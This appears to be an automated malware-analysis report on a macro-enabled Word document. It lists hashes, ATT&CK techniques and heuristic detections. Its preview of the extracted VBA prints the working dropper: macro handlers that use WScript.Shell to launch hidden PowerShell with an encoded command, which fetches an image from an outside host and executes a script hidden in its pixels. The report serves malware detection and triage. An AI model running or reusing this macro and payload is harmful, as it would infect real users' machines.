Office (OOXML) malware analysis — malicious · 3f8f70fe64445b4b

MALICIOUS

Office (OOXML)

60.7 KB Created: 2020-12-16 10:18:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-09-16

MD5: 1a2b1e6889986ed7b4ae0e8c7e51d2b4 SHA-1: 20da17e2f6ec6f033497cc8225e763f5c4e3aa21 SHA-256: 3f8f70fe64445b4b0c6e25599c4efe9798eec1ca142d24b61040387d0dd982d3

382 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro that automatically executes upon opening the document. This macro utilizes WScript.Shell and CreateObject to launch a PowerShell command. The PowerShell command appears to be obfuscated but is designed to download and execute a second-stage payload, indicated by the 'powershell -nop -sta -ep bypass -noni -w h' string and the 'EXTRACTED_FILE_STATIC_TRIAGE' heuristic firing. The presence of a Document_Open macro and the use of PowerShell are strong indicators of a malicious downloader.

Heuristics 10

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5557 bytes
SHA-256: `116fad3893fc70cb7a8fa12e9b57862086b38f7fc5f17eca74983b552444f9f2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 6 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "ComboBox11, 11, 2, MSForms, ComboBox" Attribute VB_Control = "ComboBox1, 10, 3, MSForms, ComboBox" Attribute VB_Control = "CommandButton1, 9, 4, MSForms, CommandButton" Attribute VB_Control = "TextBox1, 8, 5, MSForms, TextBox" Attribute VB_Control = "CheckBox5, 7, 6, MSForms, CheckBox" Attribute VB_Control = "CheckBox4, 6, 7, MSForms, CheckBox" Attribute VB_Control = "CheckBox3, 5, 8, MSForms, CheckBox" Attribute VB_Control = "CheckBox2, 4, 9, MSForms, CheckBox" Attribute VB_Control = "CheckBox1, 3, 10, MSForms, CheckBox" Attribute VB_Control = "OptionButton3, 2, 11, MSForms, OptionButton" Attribute VB_Control = "OptionButton2, 1, 12, MSForms, OptionButton" Attribute VB_Control = "OptionButton1, 0, 13, MSForms, OptionButton" Private Sub CommandButton1_Click() MsgBox "Thank you for completion.Your form has been submmited." End Sub Sub document_open() Debug.Print 'aaa' OptionButton1.Locked = False OptionButton2.Locked = False OptionButton3.Locked = False CheckBox1.Locked = False CheckBox2.Locked = False CheckBox3.Locked = False CheckBox4.Locked = False CheckBox5.Locked = False With Me.ComboBox1 .AddItem "USB 3.1" .AddItem "USB C" .AddItem "HDMI" .AddItem "VGA" .AddItem "Display Port" .AddItem "DVI" End With With Me.ComboBox11 .AddItem "Intel" .AddItem "AMD" .AddItem "NVIDIA" .AddItem "Qualcomm" End With End Sub Private Sub OptionButton1_Click() cmd = "powershell -nop -sta -ep bypass -noni -w hidden -enc cwBhAGwAIABxAHcAZQByAHQAeQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAHcAZQBrAHIAbQA9AHEAdwBlAHIAdAB5ACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAHEAdwBlAHIAdAB5ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ATwBwAGUAbgBSAGUAYQBkACgAIgBoAHQAdABwAHMAOgAvAC8AaQAuAGkAbQBnAHUAcgAuAGMAbwBtAC8AZwA0AEEAUwByAE0AMgAuAHAAbgBnACIAKQApADsAJAB6AHgAbQBrAHcAPQBxAHcAZQByAHQAeQAgAEIAeQB0AGUAWwBdACAANgAzADMANgAwADsAKAAwAC4ALgAzADIAKQB8ACUAewBmAG8AcgBlAGEAYwBoACgAJABoAGUAawBtAHIAIABpAG4AKAAwAC4ALgAxADkAMQA5ACkAKQB7ACQAbQBlAHIAawBnAD0AJAB3AGUAawByAG0ALgBHAGUAdABQAGkAeABlAGwAKAAkAGgAZQBrAG0AcgAsACQAXwApADsAJAB6AHgAbQBrAHcAWwAkAF8AKgAx" & _ "ADkAMgAwACsAJABoAGUAawBtAHIAXQA9ACgAWwBtAGEAdABoAF0AOgA6AEYAbABvAG8AcgAoACgAJABtAGUAcgBrAGcALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAG0AZQByAGsAZwAuAEcAIAAtAGIAYQBuAGQAIAAxADUAKQApAH0AfQA7AEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHoAeABtAGsAdwBbADAALgAuADYAMwAxADYANwBdACkAKQAKAA==" Dim Shell As Object Set Shell = CreateObject("WScript.Shell") Shell.Run (cmd) End Sub Private Sub OptionButton2_Click() cmd = "powershell -nop -sta -ep bypass -noni -w hidden -enc cwBhAGwAIABxAHcAZQByAHQAeQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAHcAZQBrAHIAbQA9AHEAdwBlAHIAdAB5ACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAHEAdwBlAHIAdAB5ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ATwBwAGUAbgBSAGUAYQBkACgAIgBoAHQAdABwAHMAOgAvAC8AaQAuAGkAbQBnAHUAcgAuAGMAbwBtAC8AZwA0AEEAUwByAE0AMgAuAHAAbgBnACIAKQApADsAJAB6AHgAbQBrAHcAPQBxAHcAZQByAHQAeQAgAEIAeQB0AGUAWwBdACAANgAzADMANgAwADsAKAAwAC4ALgAzADIAKQB8ACUAewBmAG8AcgBlAGEAYwBoACgAJABoAGUAawBtAHIAIABpAG4AKAAwAC4ALgAxADkAMQA5ACkAKQB7ACQAbQBlAHIAawBnAD0AJAB3AGUAawByAG0ALgBHAGUAdABQAGkAeABlAGwAKAAkAGgAZQBrAG0AcgAsACQAXwApADsAJAB6AHgAbQBrAHcAWwAkAF8AKgAx" & _ "ADkAMgAwACsAJABoAGUAawBtAHIAXQA9ACgAWwBtAGEAdABoAF0AOgA6AEYAbABvAG8AcgAoACgAJABtAGUAcgBrAGcALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAG0AZQByAGsAZwAuAEcAIAAtAGIAYQBuAGQAIAAxADUAKQApAH0AfQA7AEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHI ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	39936 bytes
SHA-256: `07a207d41d5669719706ae493e174c74252cb42b8139c97726edb721942901d7`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 6 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.